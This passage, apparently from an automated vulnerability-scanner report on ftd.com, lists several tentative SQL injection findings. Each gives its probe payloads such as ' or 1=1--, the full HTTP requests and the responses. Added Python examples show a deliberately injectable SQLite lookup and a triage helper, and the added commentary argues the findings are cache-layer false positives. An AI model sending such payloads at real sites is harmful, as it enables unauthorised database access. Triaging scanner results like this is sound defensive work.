<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.12. http://www.ftd.com/351 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12984083'%20or%201%3d1--%20 and 12984083'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35112984083'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:08:23 GMT
X-Varnish: 1301397318
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301397318</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35112984083'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:23 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123161
Date: Mon, 09 May 2011 01:08:25 GMT
X-Varnish: 750163468
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16543645'%20or%201%3d1--%20 and 16543645'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35116543645'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:14:56 GMT
X-Varnish: 750185848
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750185848</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35116543645'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:14:57 GMT
X-Varnish: 750186654
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11294463'%20or%201%3d1--%20 and 11294463'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/favicon.ico11294463'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:16:47 GMT
X-Varnish: 540364982
Age: 16
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540364982</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/favicon.ico11294463'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:16:48 GMT
X-Varnish: 540365912
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10658399'%20or%201%3d1--%20 and 10658399'%20or%201%3d2--%20 (URL-decoded: 10658399' or 1=1-- and 10658399' or 1=2--) were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the difference is not one the application produced: Response 1 is a 503 generated by the Varnish cache layer (Server: Varnish, Guru Meditation page, Age: 21) rather than by the Apache origin, while Response 2 is the site's standard 404 page served by Apache. Neither response shows a SQL condition being evaluated, and the parameter is the first segment of a static stylesheet path. Until the pair is replayed several times and both probes yield origin responses that differ in content, treat the finding as unconfirmed and the High severity as provisional.
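The following is an added example and is not code from the report or from ftd.com. Against a small constructed SQLite table it shows why the scanner's 1=1 / 1=2 pair produces different results when a URL path segment is concatenated into SQL, and why a bound-parameter query removes that differential. The `sites`/`markcode` schema and the two lookup functions are assumptions made for illustration; the payload strings are the ones reported for this finding.

```python
"""Added example, not code from the XSS.CX report or from ftd.com: a
constructed SQLite lookup that concatenates a URL path segment into SQL,
probed with the exact payload pair reported for finding 1.15, beside the
parameterised version that removes the differential."""
import sqlite3
from urllib.parse import unquote

# Payloads as they appear in the report, URL-decoded. The random prefix
# guarantees no real row matches, so any rows returned come from the OR clause.
TRUE_PROBE = unquote("10658399'%20or%201%3d1--%20")   # 10658399' or 1=1--
FALSE_PROBE = unquote("10658399'%20or%201%3d2--%20")  # 10658399' or 1=2--


def make_db():
    """Constructed sample data; the sites/markcode schema is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sites (markcode TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO sites VALUES (?, ?)",
                     [("350", "default"), ("351", "partner")])
    return conn


def lookup_vulnerable(conn, segment):
    """String concatenation: the quote in the probe closes the literal and the
    trailing -- comments out the closing quote the application appends."""
    sql = "SELECT name FROM sites WHERE markcode = '" + segment + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, segment):
    """Bound parameter: the whole segment is compared as a single value."""
    rows = conn.execute("SELECT name FROM sites WHERE markcode = ?", (segment,))
    return [row[0] for row in rows]


def differential(lookup, conn):
    """True when the two probes give different results, i.e. the condition
    the scanner reports as 'different responses'."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)
```

Against the concatenated query the 1=1 probe returns every row and the 1=2 probe none, which is the differential the scanner looks for; against the bound-parameter query both probes return nothing, so there is nothing to detect. A genuine differential therefore has to appear in application-generated content, which is what a reviewer should look for in the captured responses.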

Request 1

GET /35110658399'%20or%201%3d1--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 729990668
Age: 21
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729990668</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35110658399'%20or%201%3d2--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 540338180
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
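The triage helper below is an added example and not part of the report. It applies a few classification rules to the two responses captured for this finding (status lines and headers copied from Response 1 and Response 2 above, bodies cut down to the marker lines) and returns "inconclusive", because the 1=1 probe was answered by Varnish's synthetic error page rather than by the origin. The rules, the verdict names and the `confirmed` replay check are this example's own; the 200/200 pairs used in the checks are constructed.

```python
"""Added example, not from the XSS.CX report: triage of a 'tentative'
difference-based SQL injection finding. Header blocks are copied from the
report's Response 1 / Response 2 for finding 1.15; bodies are shortened to
the lines that matter. The classification rules assume a Varnish-fronted
Apache origin, as the headers indicate."""

RESP_1 = """HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
X-Varnish: 729990668
Age: 21
Via: 1.1 varnish
Connection: close

<h1>Error 503 Service Unavailable</h1>
<h3>Guru Meditation:</h3>
<p>XID: 729990668</p>"""

RESP_2 = """HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Content-Length: 123303
X-Varnish: 540338180
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">"""


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def origin_reached(status, headers, body):
    """False when the cache layer answered on the origin's behalf: Varnish's
    synthetic Guru Meditation page, or any 5xx naming the proxy as Server."""
    if "Guru Meditation" in body:
        return False
    if status >= 500 and headers.get("server", "").lower() == "varnish":
        return False
    return True


def triage(raw_true, raw_false):
    """Classify one 1=1 / 1=2 probe pair. Returns (verdict, reason)."""
    t = parse_response(raw_true)
    f = parse_response(raw_false)
    for label, resp in (("1=1", t), ("1=2", f)):
        if not origin_reached(*resp):
            return ("inconclusive",
                    f"{label} probe answered by the cache layer (HTTP {resp[0]}); "
                    "no origin response to compare")
    if t[0] != f[0]:
        return ("weak", f"status differs ({t[0]} vs {f[0]}); may be routing, replay first")
    if t[0] >= 400:
        return ("none", f"both probes hit the same error handler (HTTP {t[0]})")
    if t[2] != f[2]:
        return ("candidate", "same status, different content; confirm with replays")
    return ("none", "identical responses")


def confirmed(verdicts):
    """Only accept a finding when every replay of the pair is a candidate;
    a single cache error or identical pair disqualifies it."""
    return bool(verdicts) and all(v == "candidate" for v in verdicts)


if __name__ == "__main__":
    print(triage(RESP_1, RESP_2))
```

Run against the captured pair the helper stops at the first rule, since Response 1 never left the cache layer. The replay step is deliberately strict: a scanner that fires many probes in a short window can itself provoke the backend timeouts that Varnish turns into 503s, so a single differing pair is never enough.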

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 92130663'%20or%201%3d1--%20 and 92130663'%20or%201%3d2--%20 (URL-decoded: 92130663' or 1=1-- and 92130663' or 1=2--) were each submitted in the REST URL parameter 2. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here Response 1 is Varnish's own 503 page (Server: Varnish, Guru Meditation, Age: 15) rather than an origin response to the 1=1 probe, and Response 2 is the Apache 404 page; the parameter is the version directory of a static stylesheet path. Replay the pair and require two origin responses that differ in content before accepting the finding.

Request 1

GET /351/v2011040792130663'%20or%201%3d1--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:10:21 GMT
X-Varnish: 729997969
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729997969</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v2011040792130663'%20or%201%3d2--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
